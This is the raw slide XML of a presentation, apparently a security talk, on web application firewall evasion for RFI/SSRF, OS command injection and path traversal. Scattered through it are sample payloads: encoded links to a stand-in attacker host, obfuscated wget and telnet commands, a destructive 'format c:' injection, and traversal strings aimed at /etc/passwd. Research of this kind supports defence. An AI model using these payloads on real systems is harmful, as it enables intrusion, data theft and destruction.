            <a:off x="6186981" y="3581400"/>
            <a:ext cx="48768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Down Arrow 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10510573" y="1600200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1" name="Down Arrow 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10510573" y="2063688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2" name="Down Arrow 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10510573" y="2536781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3" name="Down Arrow 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10510573" y="3000269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Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829380" y="2527176"/>
            <a:ext cx="4876800" cy="4634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Agile Development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Down Arrow 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169341" y="2536781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Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836612" y="2977732"/>
            <a:ext cx="4876800" cy="463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Native Apps / Web Apps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Down Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180012" y="2971800"/>
            <a:ext cx="381000" cy="3862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4" name="Straight Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829380" y="3581400"/>
            <a:ext cx="48768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24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Implementation Challenges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148644" y="1742689"/>
            <a:ext cx="3345568" cy="11857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White List / Heuristic Learning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8644" y="3017201"/>
            <a:ext cx="3345568" cy="11857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Anti-Automation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99412" y="1742689"/>
            <a:ext cx="3124200" cy="118573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Continues Integration / Rush to Production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99412" y="3017201"/>
            <a:ext cx="3124200" cy="1185735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REST Architectures &amp; Native Mobile Apps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99412" y="4318889"/>
            <a:ext cx="3124200" cy="118573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Mobile ISP / Proxies &amp; Zombies Networks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1412" y="4318889"/>
            <a:ext cx="3345568" cy="11857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IP Reputation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32312" y="1747378"/>
            <a:ext cx="3429000" cy="1185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&lt;- Learning Takes Too Long -&gt;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40056" y="3017201"/>
            <a:ext cx="3421256" cy="1185735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F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&lt;- Falsely Identified as a Bot -&gt;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32824" y="4314200"/>
            <a:ext cx="3429000" cy="1185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&lt;- Block Entire Ranges -&gt;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34180" y="1234228"/>
            <a:ext cx="3352800" cy="4634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Module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979067" y="1234228"/>
            <a:ext cx="3124200" cy="4634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Technologies / Processes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32312" y="1219200"/>
            <a:ext cx="3429000" cy="46348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Issue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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66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1370012" y="3429000"/>
            <a:ext cx="9372600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="0" dirty="0" smtClean="0"/>
              <a:t>Leaving Us With Signatures…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000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78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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Additional Reasons for Incomplete Implementation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227012" y="9144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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Positives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – 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Another Major Reason for Disabling WAF Modules and Signatures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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Customization Effort </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– 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May Lead to Modules Not Being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enforced Properly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, or At All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Especially Relevant for New Sections in Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355315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Evasion Techniques In A Glimpse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9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How Evasion Techniques Are Typically Viewed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Image result for compl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2" y="1143000"/>
            <a:ext cx="85725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10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1370012" y="2514600"/>
            <a:ext cx="9372600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="0" dirty="0" smtClean="0"/>
              <a:t>Let’s Just Simplify Things…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000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1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Here’s What We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Have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OWASP XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Filter Evasion Cheat-Sheet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4"/>
              </a:rPr>
              <a:t>OWASP SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WAF Bypass Guide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 Few Discovery Platforms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5"/>
              </a:rPr>
              <a:t>wafw00f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (waffit) …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 Few Test Platforms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6"/>
              </a:rPr>
              <a:t>WAFNinja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7"/>
              </a:rPr>
              <a:t>WAFlulz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8" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>IronBee WAF Research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9"/>
              </a:rPr>
              <a:t>Imperva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>WTF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10"/>
              </a:rPr>
              <a:t>Walk-On-Fire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (w-o-f)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11"/>
              </a:rPr>
              <a:t>WAFEC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Numerous of Presentations and Guides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Generic Protocol Oriented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods / Encoding</a:t>
            </a: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 *Few* Cheats Sheets for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/XSS</a:t>
            </a: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8212" y="1143000"/>
            <a:ext cx="5648325" cy="4600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8199" y="4678093"/>
            <a:ext cx="547687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0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/>
              <a:t>Here’s What We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DON’T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> Have</a:t>
            </a:r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11252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</a:rPr>
              <a:t>Cheat Sheets for all the rest of the 300+ Attacks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OS Command Injection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Remote File Inclusion / SSRF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Path Traversal / Local File Inclusion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Malicious File Upload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Mongo Associative Array Injection (NoSQL Injection)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CSRF…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Methodology for Creating Attack-Specific Evasion Techniques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</a:rPr>
              <a:t>A Simple Way To Identify Building Blocks,           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BLOCKED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" u="sng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130" y="1602175"/>
            <a:ext cx="4103027" cy="218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8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Doing it Manually Is Typically a Mess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m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2" y="990600"/>
            <a:ext cx="6477000" cy="513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3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Here’s What We’ll Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>NOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> -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Bypass Black-list Validation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Abuse Permissive White List Validation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Target Insufficiently Protected Entry Points</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3200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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for evasion techniqu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2" y="3301553"/>
            <a:ext cx="47625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7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9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WAF Bypass Process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TARGETS (Ideal Entry Points)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Backend of Native Mobile Apps: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BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANTI-AUTOMATION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REST Services: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BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANTI-AUTOMATION (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REST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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOBILE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New Services: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VIA WHITELIST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Free-text Features:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AS PERMISSIVE AS IT GETS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UNBLOCKABLE ORIGINS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MOBILE ISP Network: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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY LIKELY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TO BE EXCLUDED FROM BLOCK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Similar IP Addresses For *.*)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Internal Network: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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY LIKELY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TO BE EXCLUDED FROM BLOCK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WAF Behavior Analysis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Patterns Blocked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– WHICH PATTERNS ARE TYPICALLY BLOCKED (MANUAL /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WAFEP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Target Analysis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Legitimate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Traffic Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Which Value Formats Are Sent and to Where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Technology Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Which Components Compose the Backend, Frontend, and Client Code</a:t>
            </a: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7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Remote File Inclusion (RFI) / SSRF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Prevention Methods &amp; Evasion Building Blocks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Prevention Methods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Black List – External Paths and Protocols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White List – Target Domain</a:t>
            </a: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Attack Building Blocks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Relative Protocols / Unrecognized Protocols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Feature Abuse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Input Misinterpretation (Traditional Evasion) - Encoding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380553"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="1847285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http://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www.external-site.com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228970"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="25146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http://www.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hacker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.com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0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RFI/SSRF Evasion Techniques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RFI Loops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RFI Vulnerable Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Calls -&gt; RFI Vulnerable Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Param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Calls -&gt;… Attacker Website</a:t>
            </a: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Unexpected Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Java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 the jar protocol – works for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip/jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file (jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;!/{entry}) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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ASP.net –</a:t>
            </a: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Partial / Relative URLs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Relative URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with missing protocols (requires developer to append http/https)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HTTP replacements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(// requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser engine) and Shares (\\)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80531"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="31242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jar: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http://www.hacker.com/file.zip!/targetFile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4896"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="993862" y="3862422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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>download?path</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>=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smb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: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//192.168.../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pathToFile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645993"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="1847285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http://www.hacker.com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093203"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="5173909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www.hacker.com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366811"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="59537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//www.hacker.com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611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Expanding on RFI/SSRF Evasions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RFI Loops – Multiple Encoding Layers in Semi-Legitimate Calls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MULTIPLE ENCODING – Can be used in conjunction with encoding / multiple encoding iterations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One Encoding Layer (Vulnerable-Page -&gt; Vulnerable-Page -&gt; URL Encoded Attacker Site)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Two Encoding Layers (Vulnerable-Page -&gt; Vulnerable-Page -&gt; URL Encoded Vulnerable-Page -&gt; Double-URL Encoded Attacker Site)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…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89011" y="1847285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http://www.hacker.com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127850"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="2966720"/>
          <a:ext cx="1089175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%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%65%72%2e%63%6f%6d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236421"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="4328160"/>
          <a:ext cx="1089175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%68%74%74%70%3a%2f%2f%76%69%63%74%69%6d%2e%63%6f%6d%2f%64%6f%77%6e%6c%6f%61%64%3f%70%61%74%68%3d%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%32%65%25%36%33%25%36%66%25%36%64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01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Command Injection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6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OS Commanding Evasion Techniques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Meaningless/NULL Characters (OS Specific)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Windows Meaningless/NULL Characters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>^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Linux Meaningless/NULL Characters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$''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Alternative Command Append Delimiters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||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&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;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&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Using Ampersand Instead of Pipe (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input/Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Referral Instead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of Pipe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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&lt;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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;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/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  <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instead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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||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Unidentified Commands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Using commands not listed in common exploits, writing and executing batch/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> files, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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275336"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989011" y="1847285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tE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^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lne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^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127.0.0.1:8080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288732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="25247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wg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$''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et 140.132.12.57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254099"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="38963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targetfile.txt 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&amp; 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format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 c: /q /u -y</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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743860"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="46482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secretFile.txt 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&gt;&gt; /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var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/www/exposed-file.txt</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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46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Path Traversal / Local File Inclusion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Path Traversal / LFI Evasion Techniques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Unexpected Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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The File:/ Protocol – the file protocol (file:/&lt;address/drive&gt;/&lt;path&gt;/&lt;file&gt;) </a:t>
            </a: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Windows Shares–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="364490" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/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Inconsistent Traversal Pattern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Upper Directories (Instead of Lower Directories using ../)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Combining Windows and Linux Traversal Characters (/ and \)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Multiplying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traversal Characters (/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\)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Abuse Detection of Multiple Traversals (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injecting ./ or .\ or /./ or \.\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Between Traversals)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658001"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="1786538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http://victim.com/download?filename=</a:t>
                      </a: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file:/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c:/boot.ini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47832"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="993862" y="25247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http://victim.com/download?filename=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\\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server-name\share-name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124055"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="3843938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http://victim.com/download?filename=</a:t>
                      </a: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/admin/connection.jsp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57407"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="993862" y="45821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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>download?filename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>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..\/\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etc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\/\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passwd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441101"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="53441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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>download?filename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>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..///..///directory///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servercode.jsp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535182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989012" y="61061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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>download?filename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
